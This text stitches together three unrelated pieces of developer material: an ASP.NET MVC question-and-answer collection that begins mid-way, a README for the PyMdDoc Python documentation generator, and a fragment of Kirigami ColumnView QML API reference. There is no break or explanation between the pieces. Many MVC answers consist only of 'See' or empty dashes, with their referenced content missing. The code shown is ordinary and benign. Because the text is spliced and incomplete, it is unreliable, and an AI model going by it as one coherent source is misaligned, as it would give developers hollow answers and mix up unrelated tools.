The width of all columns when columnResizeMode is FixedColumns.
Definition at line 163 of file columnview.h.
Every column item the view contains.
Definition at line 254 of file columnview.h.
Every item declared inside the view, both visual and non-visual items.
Definition at line 258 of file columnview.h.
The main content item of this view: it's the parent of the column items.
Definition at line 182 of file columnview.h.
The compound width of all columns in the view.
Definition at line 192 of file columnview.h.
The value of the horizontal scroll of the view, in pixels.
Definition at line 187 of file columnview.h.
How many columns this view contains.
Definition at line 167 of file columnview.h.
The position of the currently active column.
The current column will also have keyboard focus
Definition at line 172 of file columnview.h.
The currently active column.
The current column will also have keyboard focus.
Definition at line 177 of file columnview.h.
True when the user is dragging the view contents around with touch gestures.
Definition at line 233 of file columnview.h.
The first of visibleItems, provided for convenience.
Definition at line 222 of file columnview.h.
True if it supports moving the contents by dragging.
Definition at line 243 of file columnview.h.
The last of visibleItems, provided for convenience.
Definition at line 227 of file columnview.h.
True both when the user is dragging the view contents with touch gestures and when the view is animating.
Definition at line 238 of file columnview.h.
The duration for scrolling animations.
Definition at line 207 of file columnview.h.
True if columns should be visually separated by a separator line.
Definition at line 212 of file columnview.h.
The padding this will have at the top.
Definition at line 197 of file columnview.h.
The list of all visible column items that are at least partially in the viewport at any given moment.
Definition at line 217 of file columnview.h.
Member Function Documentation
Pushes a new item at the end of the view.
- Parameters
-
Definition at line 1089 of file columnview.cpp.
Removes every item in the view.
Items will be reparented to their old parent. If they have JavaScript ownership and they didn't have an old parent, they will be destroyed.
Definition at line 1273 of file columnview.cpp.
- Returns
- true if the view contains the given item
Definition at line 1282 of file columnview.cpp.
Inserts a new item in the view at a given position.
The current item will not be changed; currentIndex will be adjusted accordingly if needed to keep the same current item.
- Parameters
-
Definition at line 1094 of file columnview.cpp.
Returns the visible item containing the point x, y in content coordinates.
If there is no item at the point specified, or the item is not visible, null is returned.
Definition at line 1287 of file columnview.cpp.
A new item has been inserted.
- Parameters
-
An item has just been removed from the view.
- Parameters
-
Move an item inside the view.
The currentIndex property may be changed in order to keep currentItem the same.
- Parameters
-
Definition at line 1184 of file columnview.cpp.
Removes all the items after item.
Starting from the last column, every column will be removed until item is found, which will be left in place. Items will be reparented to their old parent. If they have JavaScript ownership and they didn't have an old parent, they will be destroyed.
- Parameters
-
- Returns
- the last item that has been removed
Definition at line 1259 of file columnview.cpp.
Removes an item from the view.
Items will be reparented to their old parent. If they have JavaScript ownership and they didn't have an old parent, they will be destroyed. currentIndex may be changed in order to keep the same currentItem.
- Parameters
-
- Returns
- the item that has just been removed
Definition at line 1209 of file columnview.cpp.
Replaces an item in the view at a given position with a new item.
The current Item and currentIndex will not be changed.
- Parameters
-
Definition at line 1127 of file columnview. | https://api.kde.org/frameworks-api/frameworks-apidocs/frameworks/kirigami/html/classColumnView.html | CC-MAIN-2022-05 | refinedweb | 923 | 59.3 |
#include <ne_ssl.h>
A client certificate can be in one of two states: encrypted or decrypted. The ne_ssl_clicert_encrypted function will return non-zero if the client certificate is in the encrypted state. A client certificate object returned by ne_ssl_clicert_read may be initially in either state, depending on whether the file was encrypted or not.
ne_ssl_clicert_decrypt can be used to decrypt a client certificate using the appropriate password. This function must only be called if the object is in the encrypted state; if decryption fails, the certificate state does not change, so decryption can be attempted more than once using different passwords.
A client certificate can be given a "friendly name" when it is created; ne_ssl_clicert_name will return this name (or NULL if no friendly name was specified). ne_ssl_clicert_name can be used when the client certificate is in either the encrypted or decrypted state, and will return the same string for the lifetime of the object.
The function ne_ssl_clicert_owner returns the certificate part of the client certificate; it must only be called if the client certificate is in the decrypted state.
When the client certificate is no longer needed, the ne_ssl_clicert_free function should be used to destroy the object.
ne_ssl_clicert_read returns a client certificate object, or NULL if the file could not be read. ne_ssl_clicert_encrypted returns zero if the object is in the decrypted state, or non-zero if it is in the encrypted state. ne_ssl_clicert_name returns a NUL-terminated friendly name string, or NULL. ne_ssl_clicert_owner returns a certificate object.
The following code reads a client certificate and decrypts it if necessary, then loads it into an HTTP session.
ne_ssl_client_cert *ccert;

ccert = ne_ssl_clicert_read("/path/to/client.p12");
if (ccert == NULL) {
    /* handle error... */
} else if (ne_ssl_clicert_encrypted(ccert)) {
    char *password = prompt_for_password();
    if (ne_ssl_clicert_decrypt(ccert, password)) {
        /* could not decrypt! handle error... */
    }
}

ne_ssl_set_clicert(sess, ccert);
ne_ssl_cert_read
Joe Orton <neon@lists.manyfish.co.uk> | http://www.makelinux.net/man/3/N/ne_ssl_clicert_read | CC-MAIN-2015-14 | refinedweb | 308 | 54.93 |
This project will be using an InnoSent IPM 165C and / or IVS 362 module to sense distance and motion towards / away from the observer.
I thought it would be a good idea to make some side by side comparisons of the unit operating inside a cluttered room and outside, pointing up in the air. A digital high pass filter was used to set all the low frequency fundamentals and first set of harmonics on the FT to zero.
As can be seen, there are a couple of spikes about 1/3 of the way along the horizontal axis on the cluttered room FT that are different from the open air, but it's not particularly obvious. There should be more spikes beyond the 3m mark, which is about 1/2 way along the horizontal, but there's nothing there.
The varactor tuning pin was given a triangular voltage signal as shown below and there was no discernible difference between inside and outside:
I'm thinking that the IVS-362 is under powered and faulty :(
Apparently the IVS-362 should have a range of 20m, so something is wrong!
These are some oscilloscope screenshots with the signal generator set to 200Hz with a voltage amplitude of 2.7 volts:
Channel IF1:
These readings were taken in a cluttered indoor environment with plenty of reflective objects in the 3 to 5 m range. But the module does not seem to be very responsive.
The IVS-362 radar module was firstly calibrated by pointing it up into the air and then a 500mm x 500mm metal sheet was positioned about 3m directly in front of it. The FT graph above clearly shows a set of readings indicating distance. We expected the set of spikes on the graph to move to the right slightly as the metal sheet was moved away, but the maximum range seems to be 3 m.
The abbreviation FMCW stands for Frequency-modulated continuous-wave radar.
On the right hand side are displayed readings from the oscilloscope, with red being the output triangular wave which feeds into the varactor input of the radar module. The blue trace is the output from the radar, amplified by the 2 stage op amp. The signal generator on the 'scope is not great quality, as can be seen by its severe graininess. However, on the left hand side, the FT generated by the Feather M4 Express still manages to separate the prominent frequencies that give an indication of object size and distance from the sensor. Code for the FT is given below.
/* This example shows the most basic usage of the Adafruit ZeroFFT library.
* it calculates the FFT and prints out the results along with their corresponding frequency
*
* The signal.h file constains a 200hz sine wave mixed with a weaker 800hz sine wave.
* The signal was generated at a sample rate of 8000hz.
*
* Note that you can print only the value (coment out the other two print statements) and use
* the serial plotter tool to see a graph.
*/
#include "Adafruit_ZeroFFT.h"
#include "signal.h"
//the signal in signal.h has 2048 samples. Set this to a value between 16 and 2048 inclusive.
//this must be a power of 2
// #define DATA_SIZE 1024
#define DATA_SIZE 1024 // This is compatible with Arduino serial plotter where x axis ring buffer cant be changed from 500.
// To make the actual plot, data size is reduced to 1000 and then divided by 2.
// the sample rate:
#define FS 39700 // Limited by speed of analogRead
int16_t data[DATA_SIZE];
int16_t bigData[DATA_SIZE];
// the setup routine runs once when you press reset:
void setup()
{
Serial.begin(115200);
while(!Serial); //wait for serial to be ready
/* // run the FFT
ZeroFFT(signal, DATA_SIZE);
// data is only meaningful up to sample rate/2, discard the other half
for(int i=0; i<DATA_SIZE/2; i++)
{
//print the frequency
//Serial.print(FFT_BIN(i, FS, DATA_SIZE));
//Serial.print(" Hz: ");
//print the corresponding FFT output
//Serial.println(signal[i]);
}
*/
}
void loop()
{
for(int i=0; i<DATA_SIZE; i++)
{
bigData[i] = 0;
}
int32_t avg = 0;
unsigned long beforeMicros = micros();
int k = 50;
for(int j=0; j<k; j++)
{
for(int i=0; i<DATA_SIZE; i++)
{
int16_t val = analogRead(A2);
// delayMicroseconds(50);
// delayMicroseconds(10); // ( 1u = 1MHz, 10u = 100 KHz, 100u = 10KHz)
avg += val;
data[i] = val;
}
unsigned long afterMicros = micros();
float totalMicros = afterMicros - beforeMicros;
//remove DC offset and gain up to 16 bits
avg = avg/DATA_SIZE;
for(int i=0; i<DATA_SIZE; i++) data[i] = (data[i] - avg) * 64;
//run the FFT
ZeroFFT(data, DATA_SIZE);
for(int i=0; i<DATA_SIZE; i++)
{
bigData[i] = data[i] + bigData[i];
}
}
int dataMax = 0;
int dataMaxIndex = 600;
for(int i=0; i<DATA_SIZE; i++)
{
data[i] = bigData[i]/k;
// Find which value of i gives the fundamental frequency:
if(data[i] > dataMax)
{
dataMax = data[i];
dataMaxIndex = i;
}
}
int fundamental_center = dataMaxIndex;
int fundamental_1 = fundamental_center - 4;
int fundamental_2 = fundamental_center - 3;
int fundamental_3 = fundamental_center - 2;
int fundamental_4 = fundamental_center - 1;
int fundamental_5 = fundamental_center + 0;
int fundamental_6 = fundamental_center + 1;
int fundamental_7 = fundamental_center + 2;
int fundamental_8 = fundamental_center + 3;
int fundamental_9 = fundamental_center + 4;
//data is only meaningful up to sample rate/2, discard the other half
for(int i=0; i<(DATA_SIZE-24)/2; i++) // The '-24' is to try get the data to fit in Arduino serial plot window.
{
// Try and remove the fundamental frequency from the plot:
if((i==fundamental_1)||(i==fundamental_2)||(i==fundamental_3)||(i==fundamental_4)||(i==fundamental_5)||(i==fundamental_6)||(i==fundamental_7)||(i==fundamental_8)||(i==fundamental_9))
{
data[i] = 0;
// Serial.println(data[i]);
}
if(data[i]<0)
{
data[i]=0;
// Serial.print(" negative value detected at index: ");Serial.println(i);...
This is pretty much the expected result for non-Doppler static object detection, so all is good. Next task is to get this waveform into a RPi via an ADC without turning it into toast. Some lowering of the voltage and removal of DC offset may be required. Then, a bit of Fourier transform magick to pull out the hidden frequency and amplitude elements.
The Radar module has been mounted on the DIY PCB with a 2 stage op amp for each signal output. Tested all ok. Great care needs to be taken to prevent damage to the module by static voltage. Next step is to hook up the oscilloscope and have a look at the output wave forms again.
Featuring mounts for the IVS 362 and the IPM 165C, with op amp circuits in the big white boxes with rounded corners. The IPM 165C has already been tested with oscilloscope and just needs the signal amplified for presentation to the ADC.The circuit schematic for the op amps is as below:
Building your own C++ Functions¶
See also
Text (Chapters 6)
Functions are an essential part of programming. They provide us with a way to break up a big program into smaller, more manageable chunks, and they provide a way for many programmers to work on a big project. We need to understand how they are written and used before our programs can get more interesting!
When we introduced the concept of a function earlier in the course (which we did so you would have some understanding of what was going on in many of our simple graphics exercises), we described a function as a box with some code in it. This is a fairly good model to use for understanding what a function really is. To understand how to write our own functions, let’s look closer at this box!
The box has two important parts - the
visible (public) part that can be
seen by other parts of your program, and the
invisible (private) part
that is
hidden from view. The user of the function has no need to really
know what is going on inside the box, they simple need to understand what the
function does, and how to call it. But, clearly, the person who actually writes
the code inside the box needs to know in gory detail what the function is up
to! The function programmer also needs to know how the function will be called,
and how to do the job the function is intended to do!
We need to create both parts of a function for it to work properly, but keeping these two parts separate in our minds is important to making functions work as a vital tool of programming!
The first thing we need to do is to describe the
public part of the
function: its name, its parameters, and its return type. The code that defines the action of the function is not part of this definition; it belongs to the private part of the function.
Here is an example of how it all looks in C++:
float my_sin(float angle)
{
    // everything inside the braces is private!
}
I named this function my_sin so it does not interfere with the real C++ sin function we have been using (from the cmath library). It takes one parameter, a floating point angle, and returns a floating point number.
Function prototypes¶
Since we have completely defined the public part of the function, we can (and should) leave off the function body part when we tell users of the function what they need to know. What we do in this case is a bit odd. We place a semicolon after the close parenthesis that marks the end of the parameter part. Like this:
float my_sin(float angle);
This is called a
function prototype and it serves a very important role in
programming.
The caller - producer contract¶
When two programmers sit down and decide how to carve off a chunk of program that will become a function, they need to agree on what the public part of the function will look like. (By the way, you might be both programmers!) That way the programmer who will use the function will know how to call it, and the programmer who will make it work will know what information they will be provided with when the function is called. This is a kind of contract between the two workers.
The prototype also serves another important role in programming.
Defining things before they can be used¶
The C++ compiler has a simple rule that programmers must follow. Before you can use any name in a program, you must have defined that name before the point where you use it. We have seen this in how we define variables at the top of our code, then use those variables in later code.
The same rule applies in using functions. What we need to do is to tell the
compiler everything it needs to know about a function before we can call that
function. We do this by placing the
function prototype at the top of our
program (before that
main line). In fact, we place it right up there where
we have been putting those
include lines.
Including files¶
You have been doing this all along, without really knowing why. Time to fix
that! Those
include lines are actually causing the compiler to read another
file on your system containing a bunch of
function prototypes for various
function we can use in our programs. Collections of these functions are called
libraries, and these help make you more productive - you do not need to
recreate code others have written for you! You can create your own libraries if
you wish. I set up a simple library of supporting graphics functions and you
access those by
including the
Graphics.h file in your program. (The
actual code for those functions is located in the
Graphics.cpp file!) We
will use this technique later when we learn how to build bigger programs
involving more than one file.
Note
In an include line, any file name surrounded by angle brackets is located
with the compiler. These are called
system libraries and they are part
of any C++ installation. File names surrounded by double quotes are local
names you need to place on your system (in with your project code, for
example).
Into the void¶
We need to make one last observation about functions before we look at how to write the actual function code.
Not all functions need parameters to be useful, and not all functions need to
return a value! In both cases, we use the word
void to mean
nothing is
here.
For instance, suppose I want to cut by big program into three parts:
- Input data
- Process data
- Output results
I might do so using these three functions:
void get_data(void);
void process_data(void);
void output_results(void);
What should jump out at you right away in looking at this is
how does data
get from inside one of these functions into the others?
The answer is something called
global variables. That is, variables defined
outside any function at the very top of your program. We really do not want
to use such variables much, but in some cases, they are useful. We will not use
them often in this class, except in a few special cases.
Function stubs¶
I tend to create functions like those shown above when I am first creating a
program. As soon as I thinks up a case where some part of the program can be
placed in a function, I create the
stub of that function using something
that looks like the prototypes shown above. Then I can write code that uses
these functions well before I figure out what goes inside the functions. We
will see an example of this in a bit.
Function implementations¶
When it is time to actually write the code of the function (perhaps in the same file with the rest of your program), we repeat the function prototype and replace the semicolon with a curly bracket pair, inside of which we place the code that does the function’s work!
The body of the function is the code between the curly braces. If the function returns a value, the body must include a return statement that hands that value back to the caller.
Just for fun, let’s look at the code that calculates the
sin of an angle,
using a technique you might find doing some research on the Internet.
Here is how the sin function gets its answer:
- sin(x) = x - x^3 /3! + x^5 /5! - x^7 /7! + …
Note
That funny upward pointing character is called a caret, but in this case it means “raised to the power of whatever number comes next”. So, “X^3” means “X*X*X” or “X raised to the third power” or “X cubed”.
Mathematicians call this a Taylor series for sin, but that is not important to us here. The formula is, though, since we will use that formula to do our calculations. If you look closely at this formula, you can see a pattern than tells you what the next term will be. You can keep going with more terms pretty much forever. The more terms you use, the better the answer will be. Unfortunately, C++ has no special power operator (which means raise the number x to this power - multiply it times itself this many times), so we need to do repeated multiplication. And, in case you don’t know what a factorial is, here is the formula for that:
- 5! = 5*4*3*2*1
Note
I know this math stuff is causing several of you some problems. Please do not let that keep you from trying this out. You will find that computers can help you with math, just as calculators do! You will get past this problem soon enough!
Local Variables¶
We know we need to create containers to hold the data we will manipulate in our programs. The function may need containers to do its work, as well. We let the function declare variables as needed inside the function. These local variables are created when the function starts work, and are destroyed when the function stops work. If you activate the function again, there is no memory of what was in these containers previously.
Strictly speaking, the parameters are also local variables, but they have a special property. They are assigned values by the caller of the function.
Coding the function body¶
Once we have the actual work we need to do inside the function figured out, and have containers for the local variables we need to use, the actual coding of the function is just like any other programming problem. However, in this case, we focus on the work of just the function, not the rest of the program. In fact, if we do this right, the programmer who writes the function code does not need to know anything about the program that will use that function.
The ideal world of programming is filled up with good solid general purpose functions that do one job well, and we use that function as a tool in constructing our new program. If every programmer had to start from scratch, we would not get very far in our world of computer programming!
We will look at the code for implementing the rest of the
my_sin function
later. For now, let's look at how we call a function.
Note
In case a function does not need parameters, you still need to supply the open and close parentheses, just put nothing between them!
Parameters can be literal values, or the names of variables defined in our calling code, or expressions the system will evaluate before calling the function. The system will pass the data we specify into the function when the function wakes up. For example:

    answer = my_sin(angle); // remember why? (assignment)
Functions with no Parameters¶
It is quite common to set up functions that do not need parameters to work, but still return a value. For example, suppose you want to write a chunk of code that gets a number from the user:
int GetUserValue(void)
{
    int value;
    while(true) {
        cout << "Enter an integer between 1 and 10:";
        cin >> value;
        if(value < 1 || value > 10)
            cout << endl << "Bad input, try again" << endl;
        else
            break;
    }
    return value;
}
Notice that we place the word void inside the parameter area on the function definition. This means that the parameter list is empty.
With this function defined, the calling code can be easier to follow:
// working...

// get the value from the user
number = GetUserValue();

// use the number
The code is much easier to follow when the details of getting a number from the user are wrapped up and placed in another spot in our program.
Functions with no Value¶
Wait a minute, functions with no value? What I really mean is functions that return no value! (They have a value, as we shall see!)
Functions do not need to return values to be useful. When we started this course, we talked about diagramming process boxes, and a function is a great way to box up the code related to doing a process. We can even use a name that describes the process. The previous example shows this. GetUserValue is a good name describing the process we want to accomplish.
Try this:
int main(int argc, char **argv)
{
    int number, factorial;

    DisplayHeading();
    DisplayInstructions();
    number = GetUserNumber();
    factorial = EvaluateFactorial(number);
    ShowResults(factorial);
    DisplayFooter();
    return EXIT_SUCCESS;
}
Hey, wait a minute. That main thing looks like a function! Exactly right! The main function is nothing more than a special function in your program that is activated by the operating system when you decide to run your program. The parameters for your program come from the operating system. We will show how this is done in a later lecture.
The DisplayHeading, DisplayInstructions, and DisplayFooter functions take no parameters, and deliver no results. The activation statement is just a reference to the function name with the parentheses, empty this time.
Notice that we do not need a return statement inside the function if we are not returning a value.
Doesn’t the program seem pretty clear, even when we do not see the function definition?
That is the point. You can use functions to break up the logic of your program the same way we used process boxes in our diagramming. Pick good names and you can almost read the program the same way you read the diagrams.
Where do we put the function declarations?¶
As we said before:
- A name must have been declared before it can be used in a program.
That means that we cannot call a function if the function has not been declared yet. So, our example program above would need to be written with the function declarations above the main function.
If we want to do this, there is no need to split up the function into two separate parts. We simple place the full definition of the function at the top of the program like this:
void DisplayHeading(void)
{
    // code to display heading
}

void DisplayInstructions(void)
{
    // code to display instructions
}

...

int main(int argc, char ** argv)
{
    DisplayHeading();
    DisplayInstructions();
    // more main program code
}
Notice that the code for the functions is missing. This code will compile and run. But the functions do not do anything. That is fine for now, since we are just starting with the program development.
Alternatively, we can choose to place the full function definition below the main program function. In this case, the code would look like this:
void DisplayHeading(void);
void DisplayInstructions(void);

int main(int argc, char ** argv)
{
    DisplayHeading();
    DisplayInstructions();
    // more main program code
}

void DisplayHeading(void)
{
    // code to display heading
}

void DisplayInstructions(void)
{
    // code to display instructions
}
Here, the compiler is happy since it knows exactly how our two functions should
be called when it processes the code inside the main function. It figured this
out by processing the
prototype lines at the top of the code. This program
works exactly like the previous one. Which one you choose to use is up to you!
More Programming in Baby Steps¶
I have been trying to get you to write your programs in small steps. Once we have functions available to us, we can create programs in a very easy way, and work with code that does something right away. Here is how it goes:
#include <iostream>
using namespace std;

int main(int argc, char ** argv)
{
    // do something useful
    cout << "DoSomethingUseful()" << endl;
    return EXIT_SUCCESS;
}
Cute, it prints out the name of a function! What good is that?
Continuing:¶
#include <iostream>
using namespace std;

void DoSomethingUseful(void)
{
    cout << "Doing Something Useful!" << endl;
}

int main(int argc, char ** argv)
{
    // do something useful
    DoSomethingUseful();
    return EXIT_SUCCESS;
}
Here, I have refined the first code by adding in the function I need. I replaced the output statement in the main program with a call to the function. That function does not really do anything useful at the moment, but it does do something. It displays a message and quits. Trust me, I actually code this way, and make sure everything works before I move on. It actually saves me time in the long run!
This kind of function is sometimes called a stub, meaning it is just a placeholder for a real function that will be refined later. We can call the function and see that the program works, even if it is not finished yet!
Let’s try another step:
#include <iostream>
using namespace std;

void DisplayInstructions(void)
{
    cout << "Enter a number between 0 and 20:";
    cout << endl;   // replace with a read later
}

void CalculateFactorial(int number)
{
    cout << "Calculating the factorial of " << number << endl;
}

int main(int argc, char ** argv)
{
    // display instructions
    DisplayInstructions();

    // do something useful
    CalculateFactorial(5);
    return EXIT_SUCCESS;
}
Here, I renamed the DoSomethingUseful function to CalculateFactorial, and changed the message to say what would happen eventually. I also added another simple function to display instructions.
I modified the CalculateFactorial function so it can get a value through a parameter.
Next, I see that the instructions are really the point where I want to get a user number. Let’s refine the program and do that:
#include <iostream>
using namespace std;

int GetUserValue(void)
{
    int value;
    while(true) {
        cout << "Enter an integer between 1 and 10:";
        cin >> value;
        if(value < 1 || value > 10)
            cout << endl << "Bad input, try again" << endl;
        else
            break;
    }
    return value;
}

void CalculateFactorial(int number)
{
    cout << "Calculating the factorial of " << number << endl;
}

int main(int argc, char ** argv)
{
    int num;

    // display instructions
    num = GetUserValue();

    // do something useful
    CalculateFactorial(num);
    return EXIT_SUCCESS;
}
Here, I expanded the body of the GetUserValue function as we showed earlier. The routine gets a number from the user, and that number is passed into the CalculateFactorial function.
This should be enough to give you an idea how Baby Steps works. At each point in the process, I made tiny modifications and kept working with a program that actually runs and does something. If I make a mistake, the tiny steps were where the mistake happened, and I should not proceed until I work through the problem.
Programming is much more fun when things work more than when they don’t! | http://www.co-pylit.org/courses/cosc1315/functions/02-building-functions.html | CC-MAIN-2018-17 | refinedweb | 3,018 | 68.91 |
I’ve long been a fan of test driven development in theory but in practice have experienced many of the issues which turn people off TDD and unit testing in general.
Brittle tests which do too much, tell you very little about the meaning behind the code and are more a hindrance than a help when it comes to making changes at a later date.
Well as you may have guessed, given the title of this post, I have found an answer to these problems in the form of BDD using MSpec and Rhino Automocking. I have been using this approach for a good while now and continue to be pleasantly surprised by just how much fun it is writing my tests, but also how stupidly easy they are to change, and how well they document my project’s requirements.
Update: You can get MSpec from github.
External Tool
It’s a good idea to set up an external tool in Visual Studio to run your MSpec tests and produce html output.
Create a new external tool which launches mspec.exe with the following arguments.
$(TargetName)$(TargetExt) --html "$(ProjectDir)Report.html"
Make sure the initial directory is $(BinDir) and tick Use output window.
Using your favourite Test Runner
Included in the MSpec download are scripts to configure various test runners to recognise and run MSpec tests.
Simply run the bat file which relates to your test runner and away you go!
Writing Specifications
Ensure you add a reference (in your Tests Project) to Machine.Specifications.dll.
Now the fun begins.
I’ve created an ASP.NET MVC site and empty class library Tests project.
Let’s say we want to create a simple page which allows users to search for a product.
We’ll start by creating a new folder in our tests folder called Controllers and adding a new class file called ProductControllerTests.cs
Having discussed this feature in detail with the client, I’ve a pretty good idea of what they want, so I start with the following.
using Machine.Specifications;

namespace MSpecExample.Tests.Controllers
{
    [Subject("Product Search")]
    public class when_product_search_page_requested
    {
        It should_return_product_search_page;
    }

    [Subject("Product Search")]
    public class when_asked_for_products_matching_search_term
    {
        It should_retrieve_a_list_of_products_with_titles_containing_the_search_term;
        It should_return_the_list_of_products_to_the_user;
    }

    [Subject("Product Search")]
    public class when_empty_search_term_entered
    {
        It should_return_an_error_message;
    }
}
What I particularly like about this, is that you can really think about exactly what you’re doing and express it in code which will eventually become executable tests without actually implementing any code (yet!).
If we now build our test project and run the tests using the console runner (via the external tool we set up earlier), we’ll get a report.html file in the tests project which looks like this…
In part 2, we’ll start implementing these tests.
In part 3, we’ll introduce Rhino AutoMocker.
Format Python however you like with Black
In the first article, we learned about Cython; today, we'll examine the Black code formatter.
Black
Sometimes creativity can be a wonderful thing. Sometimes it is just a pain. I enjoy solving hard problems creatively, but I want my Python formatted as consistently as possible. Nobody has ever been impressed by code that uses "interesting" indentation.
But even worse than inconsistent formatting is a code review that consists of nothing but formatting nits. It is annoying to the reviewer—and even more annoying to the person whose code is reviewed. It's also infuriating when your linter tells you that your code is indented incorrectly, but gives no hint about the correct amount of indentation.
Enter Black. Instead of telling you what to do, Black is a good, industrious robot: it will fix your code for you.
To see how it works, feel free to write something beautifully inconsistent like:
def add(a, b): return a+b

def mult(a, b):
    return \
        a * b
Does Black complain? Goodness no, it just fixes it for you!
$ black math
reformatted math
All done! ✨ 🍰 ✨
1 file reformatted.
$ cat math
def add(a, b):
    return a + b


def mult(a, b):
    return a * b
Black does offer the option of failing instead of fixing and even outputting a diff-style edit. These options are great in a continuous integration (CI) system that enforces running Black locally. In addition, if the diff output is logged to the CI output, you can directly paste it into patch in the rare case that you need to fix your output but cannot install Black locally.
$ black --check --diff bad
--- math 2019-04-09 17:24:22.747815 +0000
+++ math 2019-04-09 17:26:04.269451 +0000
@@ -1,7 +1,7 @@
-def add(a, b): return a + b
+def add(a, b):
+    return a + b
 def mult(a, b):
-    return \
-        a * b
+    return a * b
would reformat math
All done! 💥 💔 💥
1 file would be reformatted.
$ echo $?
1
In the next article in this series, we'll look at attrs, a library that helps you write concise, correct code quickly.
3 Comments
Is there any way to configure the style that black uses?
For example, the number of spaces it uses for each indentation level? Also I really, really dislike defs and function calls with no space before the opening parenthesis.
Nearly 40 years ago when I was writing PL/1 on a Multics system, there was a program called format_pl1 which used a specific comment at the head of the source code for customising the format.
Have we learned nothing?
You can configure black to do anything you like, as long as what you like is its default configuration....
I read the documentation and it has # fmt: off and # fmt: on to exclude those cases where you just need to preserve formatting, so I _could_ live with it.
* Sam Newman <sam.newman@> [010424 19:21]:
> I'm guessing its a catalina specific error as I've not seen a tomcat error
> like that before except in my code. Have you looked at the sourcecode?
Sure, I am stupid. It is Tomcat/Catalina 4.0b3. The source looks
simple (I do not understand it though):
// Instantiate a new instance of this filter and return it
Class clazz = classLoader.loadClass(filterClass);
this.filter = (Filter) clazz.newInstance(); // This line throws the error
filter.init(this);
return (this.filter);
this.filter is defined as a private Filter, which is a
javax.servlet.Filter. filterClass is defined as:
// Identify the class loader we will be using
String filterClass = filterDef.getFilterClass();
etc...
Maybe I will go and do some basic debugging.
/GCS
public boolean checkPressPoint(Point pressPt, int width, int height) {
how to create a rectangle to return true if the parameter Point object is inside the card object
image upload in java
Hi, I am working with Java. In my application I want to give the user the facility to add and change an image. I use an open dialog box to select the image; it works properly, i.e. on button click the open dialog opens... How can I do this?
I am using Java Swing.
import java.sql.*;
import ... java.awt.event.*;

public class UploadImage extends JFrame {
    Image img;
    JTextField
Image Processing Java
Using this code I compressed a JPEG image. The original size of the image is 257kb and the compressed image size is 27kb.

mana, August 13, 2011 at 12:28 PM:
public boolean checkPressPoint(Point pressPt, int width, int height) { how to create a rectangle to return true if the parameter Point object is inside the card object??
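One way to answer that question, sketched under the assumption that the card stores its top-left corner in x and y fields (the original class isn't shown):

```java
import java.awt.Point;
import java.awt.Rectangle;

public class Card {
    // Assumed fields: the card's top-left corner on screen.
    private int x;
    private int y;

    public Card(int x, int y) {
        this.x = x;
        this.y = y;
    }

    // Returns true if pressPt falls inside the card's bounding rectangle.
    public boolean checkPressPoint(Point pressPt, int width, int height) {
        Rectangle bounds = new Rectangle(x, y, width, height);
        return bounds.contains(pressPt);
    }

    public static void main(String[] args) {
        Card card = new Card(10, 20);
        System.out.println(card.checkPressPoint(new Point(15, 25), 72, 96));  // true
        System.out.println(card.checkPressPoint(new Point(5, 5), 72, 96));    // false
    }
}
```

java.awt.Rectangle.contains(Point) does the bounds check for you, so there is no need to compare coordinates by hand.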
Complete noob, trying to learn EF. I have a data model as follows:
public class Address
{
public int AddressID { get; set; }
public string Street { get; set; }
public string CityStateZip { get; set; }
}
public class Employee
{
public int Id { get; set; }
public string Name { get; set; }
public Address EmployeeAddress { get; set; }
}
public class Client
{
public int Id { get; set; }
public string Name { get; set; }
public Address ClientAddress { get; set; }
}
public class Vendor
{
public int Id { get; set; }
public string Name { get; set; }
public Address VendorAddress { get; set; }
}
I'm using "code first" migration in EF Core to generate the database. Everything works as you would expect except for deletes. Deleting any of the parent objects (i.e. employee) will not cascade delete the child (Address).
I've even tried changing the migration script from:
table.ForeignKey(onDelete: ReferentialAction.Restrict);
to
table.ForeignKey(onDelete: ReferentialAction.Cascade);
The database design screen even shows:
([AddressID]) ON DELETE CASCADE
Any help would be appreciated.
Hi wgcampbell,
About "Cascade Delete", here I found some document maybe you can refer to.
Cascade Delete,
Cascade deleting with EF Core.
Hope these can help you.
Regards,
Kyle.
Myself, I configure the DB engine to do cascade deletes: just delete the parent record and let the DB engine delete the records from child tables.
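For reference, here is a hedged sketch of how this relationship could be configured with EF Core's fluent API. The shadow foreign-key name "AddressID" and the one-to-one shape are assumptions, not from the thread. Note also that ON DELETE CASCADE runs from the principal (Address) to the dependent (Employee, which carries the FK); deleting an Employee never cascades to its Address, which may be why changing the migration had no visible effect.

```csharp
using Microsoft.EntityFrameworkCore;

public class AppContext : DbContext
{
    public DbSet<Employee> Employees { get; set; }

    protected override void OnModelCreating(ModelBuilder modelBuilder)
    {
        // Employee is the dependent side: it carries the FK to Address.
        // Cascade here means: deleting an Address row deletes the Employee
        // that references it, not the other way around.
        modelBuilder.Entity<Employee>()
            .HasOne(e => e.EmployeeAddress)
            .WithOne()
            .HasForeignKey<Employee>("AddressID") // assumed shadow FK name
            .OnDelete(DeleteBehavior.Cascade);
    }
}
```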
Objectives
- Work with integers.
- Learn to define functions in Arduino C++.
- Work on logic (and algorithmic) thinking.
- Different kinds of integers in C++.
Bill of materials
THE FIRST FUNCTION: CHECKING WHETHER A NUMBER IS PRIME
We have already mentioned that programming is a bit like riding a bike: you learn to ride by riding, and you learn to program… by programming. You have to learn the syntax of the language, C++ in our case, but also how to solve logical problems and split them into instructions.
Doing a programming course is fine, but in the end you have to get hands-on and have problems to solve, because only by solving them, alone or with some help, can you learn. You can’t learn to swim just by studying!
With a trembling hand, let’s focus this chapter on some classic programming examples, such as calculating prime numbers, to train the skill of finding practical algorithms to solve more or less abstract problems, and to introduce some additional concepts.
- It is important to note that there is no single way to solve a particular problem, and one solution does not have to be better than another, although efficiency or elegance criteria are often applied to choose one.
This chapter will require a little more effort than the previous ones, because we will start training a little-used muscle, the brain, in a rare task: thinking. This requires some effort, but it is necessary to advance.
Suppose we want to create a programming artefact which returns true or false depending on whether the number we provide is prime, and which we can call several times without copying the code again and again. We will call it Prime() and it works as follows: if the number is prime it must return true, otherwise it returns false; that is, it must return a boolean value.
This is what we call a function.
In fact, we have already used several functions that Arduino C++ provides, as Serial.print(), Serial.available(), abs(), etc. They are recognized by the opening and closing braces after the name.
C++ provides all the tools we need to build our own functions, which is very useful because it helps us to split a general problem into pieces or smaller functions easier to handle.
To define a function we have to declare it first and then tell C++ what it has to do. Let’s continue with our example function, Prime():
bool Prime(int x)  // x represents the parameter that will be passed to the function
{
    Here goes what the function has to do ...
    return(bool);
}
